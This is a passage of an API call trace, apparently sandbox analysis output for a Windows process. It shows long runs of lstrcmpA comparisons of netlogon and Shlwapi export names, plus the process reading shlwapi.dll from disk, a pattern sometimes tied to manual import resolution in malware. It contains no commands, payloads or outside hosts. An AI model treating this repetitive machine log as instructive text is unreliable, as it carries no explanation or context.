returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSendToSam") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogoff") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonUasLogon") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate2") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerAuthenticate3") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerGetTrustInfo") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordGet") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerPasswordSet2") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerReqChallenge") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBits") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeClientDigest") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetlogonComputeServerDigest") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessAdd", lpString2="NetAccessAdd") returned 0 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DavAddConnection") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DavDeleteConnection") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DavFlushFile") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetExtendedError") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetHTTPFromUNCPath") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DavGetUNCFromHTTPPath") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesA") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExA") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesExW") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsAddressToSiteNamesW") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsA") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsEnumerateDomainTrustsW") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcCloseW") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameA") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameW") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountA") returned 1 [0252.427] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNameWithAccountW") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextA") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcNextW") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenA") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcOpenW") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageA") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetDcSiteCoverageW") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetForestTrustInformationW") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameA") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsGetSiteNameW") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsMergeForestTrustInformationW") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleFreeMemory") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameA") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="DsValidateSubnetNameW") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugCall") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserDebugTrace") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryOtherDomains") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserQueryStatistics") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetNetlogonState") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserResetStatistics") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserServerEnum") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_BrowserSetNetlogonState") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountDeltas") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetAccountSync") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes") returned 1 [0252.428] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetChainSetClientAttributes2") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseDeltas") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseRedo") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDatabaseSync2") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsGetVersion") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetDfsIsThisADomainName") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetDCList") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetGetForestTrustInformation") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonControl2") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonGetDomainInfo") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogoff") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogon") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonEx") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonSendToSam") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogoff") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetLogonUasLogon") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate2") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerAuthenticate3") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerGetTrustInfo") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordGet") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerPasswordSet2") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerReqChallenge") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBits") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0252.429] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeClientDigest") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessDel", lpString2="I_NetlogonComputeServerDigest") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessAdd") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessDel", lpString2="NetAccessDel") returned 0 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavAddConnection") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavDeleteConnection") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavFlushFile") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetExtendedError") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetHTTPFromUNCPath") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DavGetUNCFromHTTPPath") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesA") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExA") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesExW") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsAddressToSiteNamesW") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsA") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsEnumerateDomainTrustsW") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0252.430] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0252.431] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0252.431] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0252.431] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0252.627] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0252.628] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0252.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0252.629] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0252.634] GetProcessHeap () returned 0x4e0000 [0252.634] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x2d25030 | out: hHeap=0x4e0000) returned 1 [0252.635] GetProcessHeap () returned 0x4e0000 [0252.635] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f9100 [0252.635] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0252.636] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.636] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.636] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0252.636] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0252.636] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.637] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0252.637] GetProcessHeap () returned 0x4e0000 [0252.637] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x51148) returned 0x2d25030 [0252.637] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.637] ReadFile (in: hFile=0x17c, lpBuffer=0x2d25030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d25030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0252.640] CloseHandle (hObject=0x17c) returned 1 [0252.640] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0252.640] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0252.640] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0252.640] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0252.640] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0252.640] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0252.641] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0252.641] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0252.641] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0252.641] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0252.641] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0252.642] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0252.642] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0252.642] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0252.642] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0252.642] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.642] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0252.642] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0252.642] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0252.642] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0252.642] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0252.642] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0252.642] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0252.642] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0252.643] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0252.643] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0252.643] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0252.643] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0252.643] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0252.643] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0252.643] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0252.643] lstrcmpA (lpString1="ColorHLSToRGB", 